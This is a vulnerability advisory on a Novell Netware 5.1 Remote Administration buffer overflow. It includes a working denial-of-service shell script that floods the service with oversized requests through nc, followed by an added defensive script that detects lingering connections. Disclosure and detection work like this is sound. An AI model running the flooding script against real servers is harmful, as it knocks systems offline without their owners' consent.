Netware 5.1 Remote Admin Overflow
Reported April 18, 2000 by
Michal Zalewski
VERSIONS AFFECTED
  • Novell Netware 5.1 Remote Administration Service

DESCRIPTION

The Remote Administration service contains a buffer overflow condition that could allow an attacker to launch a denial of service attack against the system, or possibly inject code into the operating system for execution.

Because of improper connection cleanup, it is possible to saturate such a system with connections to the point where it stops responding on the network.

DEMONSTRATION

This is a simple script which, left to run for some time, would probably kill Netware's TCP/IP stack. Change $SERVER and $PORT before using this to test your servers for the vulnerability.

-- kill_nwtcp.c --
#!/bin/sh

SERVER=127.0.0.1
PORT=8008
WAIT=3

DUZOA=`perl -e '{print "A"x4093}'`
MAX=30

while :; do
  ILE=0
  while [ $ILE -lt $MAX ]; do
  (
     (
       echo "GET /"
       echo $DUZOA
       echo
      ) | nc $SERVER $PORT &
      sleep $WAIT
      kill -9 $!
   ) &>/dev/null &
    ILE=$[ILE+1]
   done
sleep $WAIT
done

------------
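
On the defensive side, the saturation described above shows up as many connections from a single source to the Remote Administration port that are never cleaned up. The check below is an added example, not part of the original advisory or any Novell tooling: it assumes a Linux-style `netstat -an` listing taken on a host that terminates the connections (for instance a proxy in front of the service), the function names are illustrative, the sample rows are constructed, and the threshold of 30 simply mirrors the script's MAX.

```shell
#!/bin/sh
# Added example (not from the advisory): count TCP connections per remote
# address to one local port and print sources at or above a limit.
# Assumed columns: proto recv-q send-q local-addr remote-addr state.

count_by_source() {
    port=$1
    limit=$2
    awk -v port="$port" -v limit="$limit" '
        $1 ~ /^tcp/ && NF >= 6 {
            if ($6 == "LISTEN") next          # listening socket, not a client
            n = split($4, l, ":")             # local port is the last piece
            if (l[n] != port) next
            src = $5
            sub(/:[0-9]+$/, "", src)          # drop the remote port
            total[src]++
            if ($6 != "ESTABLISHED") stale[src]++   # half-closed or lingering
        }
        END {
            for (s in total)
                if (total[s] >= limit)
                    printf "%s total=%d not_established=%d\n", s, total[s], stale[s] + 0
        }' | sort
}

# Constructed sample table: 30 lingering connections from one source
# (documentation address ranges), one ordinary client, one unrelated port.
sample_table() {
    i=0
    while [ "$i" -lt 30 ]; do
        echo "tcp 0 0 192.0.2.10:8008 198.51.100.7:$((40000 + i)) CLOSE_WAIT"
        i=$((i + 1))
    done
    echo "tcp 0 0 192.0.2.10:8008 203.0.113.5:51000 ESTABLISHED"
    echo "tcp 0 0 192.0.2.10:22 198.51.100.7:51001 ESTABLISHED"
    echo "tcp 0 0 0.0.0.0:8008 0.0.0.0:* LISTEN"
}

sample_table | count_by_source 8008 30
```

On a live host, pipe the real connection listing into `count_by_source` in place of `sample_table` and tune the limit to the service's normal client load.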

VENDOR RESPONSE

Novell is aware of this issue; however, no response was known at the time of this writing.

CREDITS
Discovered and reported by
Michal Zalewski